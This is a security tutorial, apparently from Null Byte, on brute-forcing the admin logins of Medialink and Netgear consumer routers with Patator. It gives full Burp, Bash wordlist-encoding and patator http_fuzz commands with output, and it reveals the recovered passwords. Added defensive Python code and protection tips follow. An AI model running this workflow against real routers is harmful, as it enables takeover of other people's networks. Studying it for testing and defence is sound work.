
How to Brute-Force Router Gateway Logins with Patator « Null Byte :: WonderHowTo



Router gateways are responsible for protecting every aspect of the configuration of a network. With unrestricted access to these privileged configurations, an attacker can perform a wide range of advanced attacks on a compromised Wi-Fi network.

Brute-Forcing Router Logins with Patator

After hacking a Wi-Fi router with tools such as Aircrack, Wifiphisher, and Wifite2, there are several avenues an attacker can explore to further compromise the network. One is to immediately try to gain access to the router's gateway. Assuming the gateway does not use default credentials, the attacker will attempt to exploit a vulnerability in the router or perform a brute-force attack.

With access to the router's gateway and full control over its configuration, a hacker in this position of strength can perform a variety of attacks. They can do any of the following, and more.

  • Perform DNS poisoning attacks
  • Make the router accessible remotely
  • Change or manipulate port forwarding
  • Reset the gateway password
  • Inject JavaScript into browsers on the network
  • Reset the Wi-Fi name and password
  • Install modified firmware
  • Alter or delete login and system logs
  • Change or disable the firewall

Patator, like Hydra and Medusa, is a command-line brute-forcing tool, but it does things a little differently. The developers have tried to make Patator more reliable and flexible than its predecessors. My favorite Patator feature is the raw_request module, which lets penetration testers brute-force HTTP logins much like Burp's Intruder module.

A General Overview of the Attack

To demonstrate, I'm going to use Patator against two popular consumer routers sold on Amazon. Not all router gateways handle authentication exactly the same way, but I'll show a general procedure that applies when carrying out such attacks.

  1. Capture a login request: A single login attempt is captured in Burp to analyze the request.
  2. Identify the parameters: It is important to determine where the dynamic parameters (i.e., username and password) are located in the request. Some routers store authentication cookies or send the submitted password in a different form.
  3. Edit and save the raw request: After the parameters have been identified, a placeholder is placed in the request so Patator can iterate through the desired wordlist.
  4. Generate a targeted wordlist: A targeted wordlist of 10,000 passwords is usually more effective than one of 10 million. Some routers hash or encode the password in the browser before it is sent, and the wordlist should reflect that.
  5. Identify and filter unsuccessful requests: With modern routers, a successful login attempt rarely announces itself. Understanding and filtering HTTP status codes plays a major role in telling a failed login attempt from a successful one.

Now a warning: Patator is not very beginner-friendly, so there is a bit of a learning curve with the syntax. Before continuing, you should have a general understanding of HTTP requests, HTTP status codes, and some experience with the Burp Intruder module.

Installing Patator on Kali Linux

My first attempts to install Patator using the GitHub repository failed. There seems to be a problem with Pip when installing the required dependencies. Fortunately, a slightly older version of Patator is available in the Kali Linux repository. Use the command below to update APT and install Patator.

  ~ $ apt-get update && apt-get install patator

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following additional packages will be installed:
  ca-certificates-java default-jre default-jre-headless fonts-dejavu-extra freerdp2-x11 ike-scan java-common ldap-utils libatk-wrapper-java libatk-wrapper-java-jni libfreerdp-client2-2
  libfreerdp2-2 libgif7 libwinpr2-2 openjdk-11-jre openjdk-11-jre-headless python3-ajpy python3-bcrypt python3-dnspython python3-ipy python3-mysqldb python3-nacl python3-openssl python3-paramiko
  python3-psycopg2 unzip
Suggested packages:
  libsasl2-modules-gssapi-mit | libsasl2-modules-gssapi-heimdal libnss-mdns fonts-ipafont-gothic fonts-ipafont-mincho fonts-wqy-microhei | fonts-wqy-zenhei fonts-indic default-mysql-server
  | virtual-mysql-server python3-mysqldb-dbg python-nacl-doc python-openssl-doc python3-openssl-dbg python3-gssapi python-psycopg2-doc zip
The following NEW packages will be installed:
  ca-certificates-java default-jre default-jre-headless fonts-dejavu-extra freerdp2-x11 ike-scan java-common ldap-utils libatk-wrapper-java libatk-wrapper-java-jni libfreerdp-client2-2
  libfreerdp2-2 libgif7 libwinpr2-2 openjdk-11-jre openjdk-11-jre-headless patator python3-ajpy python3-bcrypt python3-dnspython python3-ipy python3-mysqldb python3-nacl python3-openssl
  python3-paramiko python3-psycopg2 unzip
0 upgraded, 27 newly installed, 0 to remove and 0 not upgraded.
Need to get 43.9 MB of archives.
After this operation, 192 MB of additional disk space will be used.
Do you want to continue? [Y/n]

Then use the --help option to check that Patator was installed successfully and to view the many available modules.

  ~ $ patator --help

Patator v0.7 (https://github.com/lanjelot/patator)
Usage: patator module --help

Available modules:
  + ftp_login: Brute-force FTP
  + ssh_login: Brute-force SSH
  + telnet_login: Brute-force Telnet
  + smtp_login: Brute-force SMTP
  + smtp_vrfy: Enumerate valid users using SMTP VRFY
  + smtp_rcpt: Enumerate valid users using SMTP RCPT TO
  + finger_lookup: Enumerate valid users using Finger
  + http_fuzz: Brute-force HTTP
  + ajp_fuzz: Brute-force AJP
  + pop_login: Brute-force POP3
  + pop_passd: Brute-force poppassd (http://netwinsite.com/poppassd/)
  + imap_login: Brute-force IMAP4
  + ldap_login: Brute-force LDAP
  + smb_login: Brute-force SMB
  + smb_lookupsid: Brute-force SMB SID-lookup
  + rlogin_login: Brute-force rlogin
  + vmauthd_login: Brute-force VMware Authentication Daemon
  + mssql_login: Brute-force MSSQL
  + oracle_login: Brute-force Oracle
  + mysql_login: Brute-force MySQL
  + mysql_query: Brute-force MySQL queries
  + rdp_login: Brute-force RDP (NLA)
  + pgsql_login: Brute-force PostgreSQL
  + vnc_login: Brute-force VNC
  + dns_forward: Forward DNS lookup
  + dns_reverse: Reverse DNS lookup
  + snmp_login: Brute-force SNMP v1/2/3
  + ike_enum: Enumerate IKE transforms
  + unzip_pass: Brute-force the password of encrypted ZIP files
  + keystore_pass: Brute-force the password of Java keystore files
  + sqlcipher_pass: Brute-force the password of SQLCipher-encrypted databases
  + umbraco_crack: Crack Umbraco HMAC-SHA1 password hashes
  + tcp_fuzz: Fuzz TCP services
  + dummy_test: Testing module

As mentioned, we'll focus on the http_fuzz module, designed to brute-force HTTP logins and perform various web-based injection attacks (e.g., fuzzing). View the available http_fuzz options with the following command:

  ~ $ patator http_fuzz --help

Patator v0.7 (https://github.com/lanjelot/patator)
Usage: http_fuzz <module-options ...> [global-options ...]

  Examples:
    http_fuzz url=http://10.0.0.1/FILE0 0=paths.txt -x ignore:code=404 -x ignore,retry:code=500
    http_fuzz url=http://10.0.0.1/manager/html user_pass=COMBO00:COMBO01 0=combos.txt -x ignore:code=401
    http_fuzz url=http://10.0.0.1/phpmyadmin/index.php method=POST body='pma_username=root&pma_password=FILE0&server=1&lang=en' 0=passwords.txt follow=1 accept_cookie=1 -x ignore:fgrep='Cannot log in to the MySQL server'

Module options:
  url           : target url (scheme://host[:port]/path?query)
  body          : body data
  header        : use custom headers
  method        : method to use [GET|POST|HEAD|...]
  raw_request   : load request from file
  scheme        : scheme [http|https]
  auto_urlencode: automatically perform URL-encoding [1|0]
  user_pass     : username and password for HTTP authentication (user:pass)
  auth_type     : type of HTTP authentication [basic | digest | ntlm]
  follow        : follow any Location redirect [0|1]
  max_follow    : redirection limit [5]
  accept_cookie : save received cookies to issue them in future requests [0|1]
  proxy         : proxy to use (host:port)
  proxy_type    : proxy type [http|socks4|socks4a|socks5]
  resolve       : hostname to IP address resolution to use (hostname:IP)
  ssl_cert      : client SSL certificate file (cert+key in PEM format)
  timeout_tcp   : seconds to wait for a TCP handshake [10]
  timeout       : seconds to wait for a HTTP response [20]
  before_urls   : comma-separated URLs to query before the main request
  before_header : use a custom header in the before_urls request
  before_egrep  : extract data from the before_urls response to place in the main request
  after_urls    : comma-separated URLs to query after the main request
  max_mem       : store no more than N bytes of request+response data in memory [-1 (unlimited)]
  persistent    : use persistent connections [1|0]

Global options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit

  Execution:
    -x arg              actions and conditions, see Syntax below
    --start=N           start from offset N in the wordlist product
    --stop=N            stop at offset N
    --resume=r1[,rN]*   resume previous run
    -e arg              encode everything between two tags, see Syntax below
    -C str              delimiter string in combo files (default is ':')
    -X str              delimiter string in conditions (default is ',')
    --allow-ignore-failures
                        failures cannot be ignored with -x (this is by design
                        to avoid false negatives) this option overrides this
                        behavior

  Optimization:
    --rate-limit=N      wait N seconds between each test (default is 0)
    --timeout=N         wait N seconds for a response before retrying payload
                        (default is 0)
    --max-retries=N     skip payload after N retries (default is 4) (-1 for
                        unlimited)
    -t N, --threads=N   number of threads (default is 10)

  Logging:
    -l DIR              save output and response data into DIR
    -L SFX              automatically log into DIR/yyyy-mm-dd/hh:mm:ss_SFX
                        (DIR defaults to '/tmp/patator')

  Debugging:
    -d, --debug         enable debug messages

Syntax:
 -x actions:conditions

    actions    := action[,action]*
    action     := "ignore" | "retry" | "free" | "quit" | "reset"
    conditions := condition=value[,condition=value]*
    condition  := "code" | "size" | "time" | "mesg" | "fgrep" | "egrep" | "clen"

    ignore     : do not report
    retry      : try payload again
    free       : dismiss future similar payloads
    quit       : terminate execution now
    reset      : close current connection in order to reconnect next time

    code       : match status code
    size       : match size (N or N-M or N- or -N)
    time       : match time (N or N-M or N- or -N)
    mesg       : match message
    fgrep      : search for string in mesg
    egrep      : search for regex in mesg
    clen       : match Content-Length header (N or N-M or N- or -N)

For example, to ignore all redirects to the home page:
... -x ignore:code=302,fgrep='Location: /home.html'

 -e tag:encoding

    tag        := any unique string (eg. T@G or _@@_ or ...)
    encoding   := "hex" | "unhex" | "b64" | "md5" | "sha1" | "url"

    hex        : encode in hexadecimal
    unhex      : decode from hexadecimal
    b64        : encode in base64
    md5        : hash in md5
    sha1       : hash in sha1
    url        : url encode

For example, to encode every password in base64:
... host=10.0.0.1 user=admin password=_@@_FILE0_@@_ -e _@@_:b64

Please read the README inside for more examples and usage information.

1. Attacking the Medialink AC1200 router

The first router to be attacked is the Medialink AC1200. It is currently one of Amazon's top picks for consumer routers and quite popular.

Step 1: Capture a Login Request with Burp

After configuring Firefox to proxy through Burp Suite, navigate to the AC1200's gateway at http://192.168.8.1/login.html.

Enter "password" into the password field and press Enter. Burp intercepts the login and displays the request.

Step 2: Identify the parameters

Note that the password= parameter is not "password" as expected, but the encoded string "5f4dcc3b5aa765d61d8327deb882cf99".

Those familiar with password hashing may recognize it as the MD5 hash of "password". It can be verified with the command below, which pipes the string into md5sum.

  ~ $ printf 'password' | md5sum

5f4dcc3b5aa765d61d8327deb882cf99 - 

That tells us the wordlist used to brute-force the gateway must be in MD5 format. With this particular router, there is no username field on the gateway's login page. We can see from the captured request that the username 'admin' is already included. So there is only one dynamic parameter: the password.

Step 3: Edit and save the raw request

Change the hashed password parameter to "FILE0" within the request. This serves as a placeholder that tells Patator where the passwords should be inserted. (It will make more sense in a later step.)

Right-click in the window and select the "Copy to file" option. Save it in the /tmp folder with the filename "router_request.txt".

Step 4: Generate a Targeted Wordlist

As we discovered earlier, passwords are hashed in the browser before being sent to the router for authentication. Patator has a built-in function for hashing passwords, but let's take this opportunity to learn a few Bash tricks for password manipulation.

First download a wordlist. Any generic wordlist is fine for testing purposes. Use the wget command below to download my wordlist, generated by analyzing leaked databases.

  ~ $ wget 'https://git.io/fhhvc' -O /tmp/wordlist.txt

--2020-01-15 03:19:58--  https://git.io/fhhvc
Resolving git.io (git.io)... 52.7.169.168
Connecting to git.io (git.io)|52.7.169.168|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/tokyoneon/1wordlist/master/1wordlist2rulethem%40ll.txt [following]
--2019-03-08 03:20:01--  https://raw.githubusercontent.com/tokyoneon/1wordlist/master/1wordlist2rulethem%40ll.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.68.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.68.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 25585 (25K) [text/plain]
Saving to: 'wordlist.txt'

wordlist.txt        100%[========================================>]  24.99K  68.9KB/s    in 0.4s

2020-01-15 03:20:05 (68.9 KB/s) - 'wordlist.txt' saved [25585/25585]

The Bash one-liner below uses a for loop to iterate over the passwords in the wordlist. Each password is converted to an MD5 hash and appended to the md5_wordlist.txt file.

  ~ $ for password in $(cat /tmp/wordlist.txt); do printf '%s' "$password" | md5sum | awk '{print $1}' >> /tmp/md5_wordlist.txt; done

The new md5_wordlist.txt file can be viewed with the head command below, which prints the first ten lines.

  ~ $ head /tmp/md5_wordlist.txt

e10adc3949ba59abbe56e057f20f883e
e587466319da83fe4bdf4ceae9746357
dc483e80a7a0bd9ef71d8cf973673924
eba4820c4a707c3c72d16050177423b6
9924d38821446082ce5e4c9d88e1430f
b3d3bdba829b1fef75a5b22c20a14738
5f4dcc3b5aa765d61d8327deb882cf99
e680528370af6ef220d0f23b8e58e812
d234e0453a5f37630379880b9136e959
1acc444503b44377c3ba6e595fcf2940 

Step 5: Identify and filter failed requests

With router_request.txt and the hashed wordlist, the router's gateway can be brute-forced with Patator using the following command. To stop the attack at any time, press Control-C.

  ~ $ patator http_fuzz raw_request=/tmp/router_request.txt accept_cookie=1 follow=1 0=/tmp/md5_wordlist.txt -l /tmp/AC1200

To break down that command:

  • raw_request= – Use the router_request.txt created in an earlier step to generate login attempts against the router's gateway.
  • accept_cookie= – Save received cookies to issue in future requests.
  • follow= – Follow Location redirects (e.g., 302 status codes) for both failed and successful login attempts when instructed by the server.
  • 0= – The "FILE0" placeholder in router_request.txt cycles through the supplied password list.
  • -l – Save output to the specified directory. All Patator responses are stored there in an organized way.

After executing the command, my output looks like this:

code size:clen       time | candidate                        | num | mesg
-----------------------------------------------------------------------------
200  20:-1          0.015 | e10adc3949ba59abbe56e057f20f883e | 1 | HTTP/1.0 200 OK
200  20:-1          0.035 | e587466319da83fe4bdf4ceae9746357 | 2 | HTTP/1.0 200 OK
200  20:-1          0.048 | dc483e80a7a0bd9ef71d8cf973673924 | 3 | HTTP/1.0 200 OK
200  20:-1          0.041 | eba4820c4a707c3c72d16050177423b6 | 4 | HTTP/1.0 200 OK
200  20:-1          0.054 | 9924d38821446082ce5e4c9d88e1430f | 5 | HTTP/1.0 200 OK
200  20:-1          0.060 | 5f4dcc3b5aa765d61d8327deb882cf99 | 7 | HTTP/1.0 200 OK
200  20:-1          0.067 | 1acc444503b44377c3ba6e595fcf2940 | 10 | HTTP/1.0 200 OK
200  20:-1          0.069 | 25d55ad283aa400af464c76d713c07ad | 11 | HTTP/1.0 200 OK
200  20:-1          0.069 | d8578edf8458ce06fbc5bb76a58c5ca4 | 12 | HTTP/1.0 200 OK
200  20:-1          0.070 | bfcfa776182bf88f23cc0e78bde9bd55 | 13 | HTTP/1.0 200 OK
200  20:-1          0.070 | 5fcfd41e547a12215b173ff47fdd3739 | 14 | HTTP/1.0 200 OK
200  20:-1          0.070 | 02c75fb22c75b23dc963c7eb91a062cc | 15 | HTTP/1.0 200 OK
200  20:-1          0.079 | b3d3bdba829b1fef75a5b22c20a14738 | 6 | HTTP/1.0 200 OK
200  20:-1          0.070 | f26e6a5828c8a1c908f86c0674c4b0c1 | 16 | HTTP/1.0 200 OK
200  20:-1          0.070 | 0d107d09f5bbe40cade3de5c71e9e9b7 | 17 | HTTP/1.0 200 OK
200  20:-1          0.073 | e680528370af6ef220d0f23b8e58e812 | 8 | HTTP/1.0 200 OK
200  20:-1          0.070 | 25f9e794323b453885f5181f1b624d0b | 18 | HTTP/1.0 200 OK
200  20:-1          0.086 | d234e0453a5f37630379880b9136e959 | 9 | HTTP/1.0 200 OK
200  20:-1          0.069 | 9aaee58c21bf17a001b5325dffecbb6c | 19 | HTTP/1.0 200 OK
200  20:-1          0.069 | c41788ac68e6c17c59a6412c424dc763 | 20 | HTTP/1.0 200 OK
200  20:-1          0.069 | 7702417fd301623eff2ba8f6abf05ff6 | 21 | HTTP/1.0 200 OK
200  20:-1          0.069 | a79e7fabc870d2c67141008c58088b47 | 31 | HTTP/1.0 200 OK
200  20:-1          0.069 | e99a18c428cb38d5f260853678922e03 | 22 | HTTP/1.0 200 OK
200  20:-1          0.069 | 4297f44b13955235245b2497399d7a93 | 32 | HTTP/1.0 200 OK
200  20:-1          0.069 | e7d094da9fe5b55c3a84806ba4fd3276 | 23 | HTTP/1.0 200 OK
200  20:-1          0.067 | 9ccc031dbebc6705fc8443df29b0971f | 33 | HTTP/1.0 200 OK
200  20:-1          0.069 | 04085330aed79347b6427f9111ce384f | 24 | HTTP/1.0 200 OK
200  20:-1          0.069 | 1c63129ae9db9c60c3e8aa94d3e00495 | 34 | HTTP/1.0 200 OK
200  20:-1          0.069 | ccebddaa34a9459df50d2d32177ea06e | 25 | HTTP/1.0 200 OK
200  20:-1          0.069 | 5416d7cd6ef195a0f7622a9c56b55e84 | 26 | HTTP/1.0 200 OK
200  20:-1          0.069 | dccfdb716551ca6210e9b93248674dd7 | 27 | HTTP/1.0 200 OK
200  20:-1          0.069 | 1f6cac35000ad57b1af2e34926043ebe | 28 | HTTP/1.0 200 OK
200  20:-1          0.069 | bed128365216c019988915ed3add75fb | 29 | HTTP/1.0 200 OK
200  20:-1          0.069 | bc597773a32c44479efd83855733aed6 | 30 | HTTP/1.0 200 OK
200  20:-1          0.071 | d5e0708d403467017d4dd217178112b5 | 41 | HTTP/1.0 200 OK
200  20:-1          0.071 | 161ebd7d45089b3446ee4e0d86dbcf92 | 42 | HTTP/1.0 200 OK
200  20:-1          0.070 | 5dc5d1aa29ea20ce91ec6c7fe5a44f56 | 43 | HTTP/1.0 200 OK
200  20:-1          0.070 | 3d68b18bd9042ad3dc79643bde1ff351 | 44 | HTTP/1.0 200 OK
200  20:-1          0.069 | b76be48e061aa8948d153fec67a08cb4 | 35 | HTTP/1.0 200 OK
200  20:-1          0.071 | 3bf1289e5cd6187c0e0de34edfe27b90 | 45 | HTTP/1.0 200 OK

Hypertext Transfer Protocol (HTTP) status codes, also known as response codes are issued by web servers to our web browsers when we submit requests. These codes are a way for web servers to report errors to server administrators, web developers, and end users.

Sometimes a 200 status code ("200 OK") indicates that the server has accepted the supplied password. In this case, though, every login attempt produces a "200 OK" response, so it helps to identify what a failed login attempt looks like instead.

The "size" column can also be very useful. It shows the size (in bytes) of the server's response to the login attempt. Every attempt so far returned 20 bytes, so it is reasonably safe to assume that this size indicates a failed login, in which case responses of that size can be omitted. Do this by adding the -x ignore:size=20 argument.

  ~ $ patator http_fuzz raw_request=router_request.txt -x ignore:size=20 accept_cookie=1 follow=1 0=/tmp/md5_wordlist.txt -l /tmp/AC1200

code size:clen       time | candidate                        | num | mesg
-----------------------------------------------------------------------------
200  3962:3363      0.201 | d487dd0b55dfcacdd920ccbdaeafa351 | 291 | HTTP/1.0 200 OK
Hits/Done/Skip/Fail/Size: 1/3142/0/0/3142, Avg: 138 r/s, Time: 0h 0m 22s

Now only one request is displayed, with a size of 3,962 bytes.
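The same signal that lets the attacker spot the one successful attempt (a burst of identical responses, then a single response of a different size) is what a defender should alarm on from the gateway's side. The following is an added example, not code from the original article or from Patator: a small Python detector that reads router access-log lines, counts login POSTs per client inside a sliding time window, and reports the dominant response shape plus every response that deviates from it. The combined-style log format, the sample lines, and the client addresses are constructed for this example; the 20-byte and 3,962-byte response sizes mirror the AC1200 behaviour described above.

```python
# Added example, not from the original article: a defender-side detector that
# reads a router gateway's HTTP access log and flags the trace a brute-force
# run leaves behind. The log format (combined-log style) and the sample lines
# are constructed for this example.
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "method": m["method"],
        "path": m["path"],
        "status": int(m["status"]),
        "size": 0 if m["size"] == "-" else int(m["size"]),
    }


def detect_login_bursts(lines, login_path="/login.html",
                        window=timedelta(seconds=60), threshold=20):
    """Flag clients that POST to the login page `threshold` or more times within
    `window`. For each such client, report the dominant (status, size) shape of
    the responses (what a failed attempt looks like) and every response that
    deviates from it (the candidate successful login)."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == login_path:
            per_ip[rec["ip"]].append(rec)

    findings = []
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r["ts"])
        # Sliding window: largest number of attempts that fit inside `window`.
        peak, start = 0, 0
        for end in range(len(recs)):
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak < threshold:
            continue
        shape = Counter((r["status"], r["size"]) for r in recs)
        dominant = shape.most_common(1)[0][0]
        outliers = [r for r in recs if (r["status"], r["size"]) != dominant]
        findings.append({
            "ip": ip,
            "attempts": len(recs),
            "peak_in_window": peak,
            "dominant_response": dominant,
            "outliers": outliers,
        })
    return findings


def _line(ip, second, method, path, status, size):
    # Helper that builds one constructed sample log line.
    return (f'{ip} - - [15/Jan/2020:03:25:{second:02d} +0000] '
            f'"{method} {path} HTTP/1.0" {status} {size}')


# Constructed sample: 40 login attempts answered with a 20-byte 200 OK, then one
# answered with a 3,962-byte page, plus ordinary browsing from another client.
SAMPLE_LOG = (
    [_line("192.168.8.100", s, "POST", "/login.html", 200, 20) for s in range(40)]
    + [_line("192.168.8.100", 40, "POST", "/login.html", 200, 3962)]
    + [_line("192.168.8.23", 5, "GET", "/index.html", 200, 4870),
       _line("192.168.8.23", 9, "POST", "/login.html", 200, 20)]
)

if __name__ == "__main__":
    for f in detect_login_bursts(SAMPLE_LOG):
        print(f"{f['ip']}: {f['attempts']} attempts, failed-login shape "
              f"{f['dominant_response']}, {len(f['outliers'])} deviating response(s)")
```

The threshold and window are deliberately low here; a real gateway sees a handful of admin logins per day, so even twenty POSTs to the login page in a minute from one client is a strong signal, and the single deviating response marks the attempt that deserves a password reset and a look at the config.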

There are a few ways to recover the plaintext of the discovered hash. The passwords in wordlist.txt and md5_wordlist.txt appear in the same order; the only difference is that one list is plaintext and the other is hashed.

Below we use nl to number each line of md5_wordlist.txt, then grep for the hash.

  ~ $ nl /tmp/md5_wordlist.txt | grep 'd487dd0b55dfcacdd920ccbdaeafa351'

291 d487dd0b55dfcacdd920ccbdaeafa351 

The hash appears on line 291 of the md5_wordlist.txt file. Now use nl on the regular text dictionary and grep to find the line number.

  ~ $ nl /tmp/wordlist.txt | grep '291'

291 yellow 

The password is "yellow". It can be further verified with the following command:

  ~ $ printf 'yellow' | md5sum

d487dd0b55dfcacdd920ccbdaeafa351 

2. Attacking the Netgear N300 router

A Netgear N300 series router is next on the list of targets. It is also one of Amazon's top picks for entry-level consumer Wi-Fi routers.

Step 1: Capture a Login Request with Burp

We follow the same procedure as before, starting with capturing the raw request. Navigate to the router's gateway using a web browser configured to proxy through Burp. Enter the "admin" and "password" credentials when prompted.

Step 2: Identify the parameters

Note that this time there is no obvious password= parameter like the Medialink AC1200's.

The string above is not an MD5 hash. Although it may look encrypted or protected in some way, it is simple base64 encoding. The string can be decoded with the command below.

  ~ $ printf 'YWRtaW46cGFzc3dvcmQ=' | base64 -d

admin:password

The username and password are merged into a single string and base64-encoded. This is called HTTP basic authentication. It should only be used over HTTPS, because an attacker on the network can easily capture the password.
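To make the point concrete from the defender's side, here is an added Python example (not code from the original article or from Patator) that reads a raw HTTP request of the kind Burp exports to a file, finds the Authorization header and reports what an on-path observer learns from it: with Basic auth the username comes straight out of the header, and the password is exposed whenever the transport is plain HTTP. The sample request is constructed; its Basic token is the one shown above (admin:password) and the Host address is a documentation-range placeholder.

```python
# Added example, not from the original article: audit the Authorization header
# of a raw HTTP request and describe the credential exposure. The sample
# request below is constructed; 192.0.2.1 is a documentation-range placeholder.
import base64
import binascii


def parse_raw_request(raw):
    """Split a raw HTTP request into (method, target, version, headers).
    Header names are lower-cased so lookups are case-insensitive."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, target, version, headers


def audit_authorization(raw, over_tls=False):
    """Describe the credential exposure of the request's Authorization header.
    A Basic token is decoded only far enough to recover the username; the
    point is that base64 is reversible, so anyone who sees the header on a
    plaintext connection has the password as well."""
    _, _, _, headers = parse_raw_request(raw)
    auth = headers.get("authorization")
    if auth is None:
        return {"scheme": None, "username": None, "password_exposed": False,
                "note": "no Authorization header"}
    scheme, _, token = auth.partition(" ")
    if scheme.lower() != "basic":
        return {"scheme": scheme, "username": None, "password_exposed": False,
                "note": "not Basic; the password is not recoverable from this header alone"}
    try:
        decoded = base64.b64decode(token.strip(), validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return {"scheme": "Basic", "username": None, "password_exposed": False,
                "note": "malformed Basic token"}
    username, _, _password = decoded.partition(":")
    return {
        "scheme": "Basic",
        "username": username,
        "password_exposed": not over_tls,
        "note": ("Basic auth is base64 encoding, not encryption; "
                 + ("TLS protects it in transit" if over_tls else "sent in cleartext")),
    }


# Constructed sample request (placeholder host, token from the article).
SAMPLE_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: 192.0.2.1\r\n"
    "Authorization: Basic YWRtaW46cGFzc3dvcmQ=\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n"
)

if __name__ == "__main__":
    print(audit_authorization(SAMPLE_REQUEST))
    print(audit_authorization(SAMPLE_REQUEST, over_tls=True))
```

Run over a capture of the admin session, the over_tls flag is the only thing that changes the verdict; the header itself is the same bytes either way, which is why the protection section later recommends never using this scheme without HTTPS.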

Step 3: Edit and Save the Raw Request

With the username and password parameters identified, the raw request can be edited to include the Patator placeholder and saved to a local file.

Right-click in the window and select the "Copy to file" option. Save it in the /tmp folder with the filename "router_request.txt".

Step 4: Generate a targeted word list

Now that we know what kind of authentication parameter is in use, a wordlist can be generated specifically for this router. Again, Patator has a built-in function to encode passwords, but password manipulation is a good skill to learn; it can be applied to other brute-forcing tools, for example.

Download a generic wordlist for testing purposes. Use the wget command below to download my wordlist, generated by analyzing leaked databases.

  ~ $ wget 'https://git.io/fhhvc' -O /tmp/wordlist.txt

The Bash one-liner below uses a for loop to cycle through the passwords in the wordlist. Each password is merged with the username into a single string and converted to base64. All encoded strings are appended to the /tmp/base64_wordlist.txt file.

  ~ $ for password in $(cat /tmp/wordlist.txt); do printf '%s' "admin:$password" | base64 >> /tmp/base64_wordlist.txt; done

The encoded passwords can be verified with the head command, which prints the first ten lines of the file.

  ~ $ head /tmp/base64_wordlist.txt

YWRtaW46MTIzNDU2
YWRtaW46QWJjZGVmMTIz
YWRtaW46YTEyMzQ1Ng==
YWRtaW46bGl0dGxlMTIz
YWRtaW46bmFuZGEzMzQ=
YWRtaW46Tjk3bm9raWE=
YWRtaW46cGFzc3dvcmQ=
YWRtaW46UGF3ZXJqb24xMjM=
YWRtaW46NDIxdWlvcHkyNTg=
YWRtaW46TVl3b3JrbGlzdDEyMw==

Step 5: Identify and filter failed requests

The router's gateway can be brute-forced with Patator using the router_request.txt and base64_wordlist.txt files. Remember that while Patator is running, it can be stopped at any time by pressing Control-C.

  ~ $ patator http_fuzz raw_request=/tmp/router_request.txt accept_cookie=1 follow=1 0=/tmp/base64_wordlist.txt -l /tmp/N300

code size:clen       time | candidate                | num | mesg
-----------------------------------------------------------------------------
401  508:-1         0.006 | YWRtaW46MTIzNDU2         | 1 | HTTP/1.0 401 Unauthorized
401  508:-1         0.023 | YWRtaW46MTIzNDU2Nzg=     | 11 | HTTP/1.0 401 Unauthorized
401  508:-1         0.022 | YWRtaW46Y2h1cnUxMjNB     | 21 | HTTP/1.0 401 Unauthorized
401  508:-1         0.023 | YWRtaW46QWJjZGVmMTIz     | 2 | HTTP/1.0 401 Unauthorized
401  508:-1         0.024 | YWRtaW46cXdlcnR5         | 12 | HTTP/1.0 401 Unauthorized
401  508:-1         0.007 | YWRtaW46YTEyMzQ1Ng==     | 3 | HTTP/1.0 401 Unauthorized
401  508:-1         0.024 | YWRtaW46bmtzMjMwa2pzODI= | 13 | HTTP/1.0 401 Unauthorized
401  508:-1         0.024 | YWRtaW46bGl0dGxlMTIz     | 4 | HTTP/1.0 401 Unauthorized
401  508:-1         0.025 | YWRtaW46bmFuZGEzMzQ=     | 5 | HTTP/1.0 401 Unauthorized
401  508:-1         0.026 | YWRtaW46enhjdmJubQ==     | 15 | HTTP/1.0 401 Unauthorized
401  508:-1         0.023 | YWRtaW46Tjk3bm9raWE=     | 6 | HTTP/1.0 401 Unauthorized

HTTP status codes are split into different categories or "classes". The first digit defines the categories and the following digits are subcategories that are specific to different types of error messages. For example, the 4xx categories are a class of errors specific to HTTP requests that the web server cannot comply with, such as trying to view a web page that does not exist. That is defined as a "404 not found" status, probably one of the best known status codes on the internet.

We immediately see a ton of 401 status codes, which are clear indications of failed login requests. These can be omitted from the output with the -x ignore:code=401 argument.

  ~ $ patator http_fuzz raw_request=/tmp/router_request.txt -x ignore:code=401 accept_cookie=1 follow=1 0=/tmp/base64_wordlist.txt -l /tmp/N300

code size:clen       time | candidate                | num | mesg
-----------------------------------------------------------------------------
200  622:-1         0.017 | YWRtaW46cGFzc3dvcmQ=     | 7 | HTTP/1.0 200 OK

This time we received only one request with a 200 status code. The response is 622 bytes, larger than a failed 401 response. That is a good sign. The credentials can be decoded with the following command:

  ~ $ printf 'YWRtaW46cGFzc3dvcmQ=' | base64 -d

admin:password

How to Protect Yourself from Router Gateway Attacks

Regularly updating the firmware helps against exploits and Routersploit attacks. A strong (non-default) password prevents brute-force attacks carried out with Patator.

  • Update the firmware. Router vendors frequently release bug and exploit patches. It is important to keep the router firmware up to date and, where possible, have it check for updates automatically.
  • Disable remote administration. Some routers allow remote access by default. Without your knowledge, hackers can find your router on the internet and take control of it.
  • Change default passwords. Never use default passwords. This applies to the Wi-Fi password that other devices use to connect to the router, but also to the admin portal, which lets you change sensitive router settings. There are many websites dedicated to sharing default admin passwords.
  • Use WPA2 encryption. Only use WPA2 encryption. Weaker options such as WEP make your router extremely vulnerable to attackers.
